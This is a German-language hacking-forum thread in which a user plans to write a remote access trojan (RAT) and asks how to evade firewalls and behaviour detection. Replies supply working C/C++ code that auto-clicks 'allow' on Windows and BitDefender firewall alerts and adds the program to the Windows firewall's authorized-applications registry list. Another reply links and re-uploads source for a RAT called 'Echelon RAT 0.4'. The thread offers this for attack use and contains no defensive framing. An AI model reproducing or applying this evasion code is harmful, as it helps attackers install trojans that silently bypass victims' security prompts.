RAT Programmierung

[Lain]

Hi Leute,
ich dachte mir ich programmiere mal ein kleines RAT, der Netzwerkcode sowie die normalen Trojanerfunktionen (scree capture, down/upload von Dateien usw.) sind ja kein Problem, aber beim firewall bypass oder dem umgehen der Verhaltenserkennung wird es schon schwieriger.

Vielleicht hat jemand den Quelltext von alten Trojanern (möglichst einfache aber mit den unten genannten Funktionen) hier, so das man mal nachsehen kann wie die das machen (wenn ich über Google danach suche lande ich immer nur in alten Threads wo die hochgeladenen Dateien nicht mehr da sind). Einer in VB wäre schön aber C/C++ ist auch OK.

Hilfreich wären auch Hinweise nach welchen Begriffen man da am besten googelt mit z.B. firewall bypass komme ich nicht weit.

Mein Problem ist das die Verhaltenserkennnung der Firewall merkt wenn sich das Programm ins Userverzeichnis kopiert und dort startet, sowie wenn es sich in den Autostart schreibt und natürlich das die TCP Verbindung die es aufbauen will blockiert wird.

[ThunderStorm]

pwnat - NAT to NAT client-server communication

Alternativ könntest du auch einfach über die WinAPI die Meldungen der Firewall manipulieren.
Mit .NET brauchst du da nicht anfangen, mit VB erst recht nicht.
Beispiel:

////////////////////////////////

//     Firewall By Pass       //

////////////////////////////////

#include "includes.h"

#include "functions.h"

#include "externs.h"



#ifndef NO_BYPASS



DWORD WINAPI BypassThread(LPVOID)

{

    while(1)

    {

        HWND wnd = 0;

       

        if( (wnd = fFindWindow(0, "Windows Security Alert")) )

        {

            // Click the "allow" button.

            fSendMessage(wnd, WM_COMMAND, MAKEWORD(104,BN_CLICKED ), 0);

            // wait for the window to close

            while( fIsWindow(wnd) ) Sleep(50);

         break;

        }

        else if( (wnd = fFindWindow(0, "BitDefender Firewall Alert")) )

        {

            // Click the "remember" button (Doesn't work right now)

            fSendMessage(wnd, WM_COMMAND, MAKEWORD(13133, BN_CLICKED ), 0);

            // Click the okay button

            fSendMessage(wnd, WM_COMMAND, MAKEWORD(IDOK,BN_CLICKED ), 0);

            // Wait for the window to close

            while( fIsWindow(wnd) ) Sleep(50);

         break;

        }

        Sleep(30); // Don't use 100% CPU

    }

    return 0;

}

#endif 

Für die Windows Firewall

#define WIN32_LEAN_AND_MEAN

#include <winsock2.h>

#include <windows.h>

#include <string>

using namespace std;



void AddException(string path)

{

	HKEY hk;

	DWORD dw;

	

	string skey = path + ":*:Enabled:@xpsp2res.dll,-22019";

	

	RegCreateKeyExA(

		HKEY_LOCAL_MACHINE,

		"SYSTEM\\ControlSet001\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile\\AuthorizedApplications\\List",

		0,

		NULL,

		REG_OPTION_NON_VOLATILE,

		KEY_WRITE,

		NULL,

		&hk,

		&dw

		);

	

	RegSetValueExA(

		hk,

		path.c_str(),

		0,

		REG_SZ,

		(BYTE*)skey.c_str(),

		(DWORD)skey.length()

		);

	

	RegCloseKey(hk);

}



int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)

{

	char  *CmdLineA, *Location;

	

	CmdLineA = GetCommandLineA();

	Location = CmdLineA + 1;

	Location[strlen(Location)-2] = 0;

	

	AddException(Location);

}

Der Nachteil ist halt dass du dir für jedes verbreitete AV einen Handler schreiben musst.

[Prinzessin Paat]

Der Nachteil ist halt dass du dir für jedes verbreitete AV einen Handler schreiben musst.

Dafür gibt es sicherlich in Fachbezogenen Foren einige Vorlagen. Schau einfach mal bei Back2Hack oder sowas.

[iToxic]

Echelon RAT 0.4 von Krusty. Geschrieben in VB.NET:

Anhang 3594

http://www.xup.in/dl,40448112/ecln_0.4.rar/

[ThunderStorm]

Ist irgendwie kaputt:

! C:\Downloads\ECLN_0.4.RAR: Der Dateikopf von "" ist zerstört.
! C:\Downloads\ECLN_0.4.RAR: Unerwartetes Archivende.

Könntest du das nochmal hochladen? Am besten gleich als Anhang, die Captchas sucken...

[iToxic]

Aber klar doch

ECLN_0.4.RAR